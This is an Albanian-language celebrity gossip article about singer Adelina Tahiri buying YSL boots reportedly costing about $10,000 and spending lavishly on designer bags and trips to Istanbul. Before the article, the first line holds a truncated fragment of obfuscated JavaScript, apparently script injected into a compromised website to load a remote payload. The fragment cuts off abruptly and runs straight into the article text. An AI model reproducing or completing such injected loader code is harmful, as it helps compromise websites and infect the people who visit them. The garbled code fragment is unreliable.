;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nuk ngopet me pak: Adelina Tahiri blen çizmet e famshme 10,000 dollarëshe (FOTO)

By

Përveç se si këngëtare, njihet si një vajzë që shpenzon shuma marramendëse në veshje e udhëtime luksoze.

Këngëtares nga Shkupi, Adelina Tahirit, vetëm klipi i këngës “S’je normal?”, i ka kushtuar sa cimet e kokës, e vetëm në veshje ka shpenzuar mbi 20 mijë euro.

Çanta të markave më të njohura, Louis Vitton, Gucci, Hermes e Dior, çanta këto dizajnerësh, e kanë mbushur dollapin e saj.

Thuajse çdo fundjavë ajo udhëton për në Stamboll, duke u kthyer me dhjetëra qese blerjesh, në të cilat shpenzohen me mijëra euro.

E blerja e saj e fundit shënon një shifër marramendëse, shifër e cila dikujt tjetër do i hynte shumë në punë për të rregulluar pak standardin e jetës, sic është blerja e ndonjë makine.

Janë çizmet Yives Saint Laurent – YSL, ato të cilat këngëtarja Tahiri tashmë i ka në koleksionin e saj, e që kushtojnë rreth 10,000 dollarë, një blerje kjo shumë e shtrenjtë.

Përvec saj, çizmet e famshme i posedojnë edhe fytyra të njohura botërore si Rihanna e Kendall Jenner, e së fundmi edhe modelja shqiptare Emina Çunmulaj.

T’i gëzosh Adelina! /Prive.al

Artikuj të ngjashëm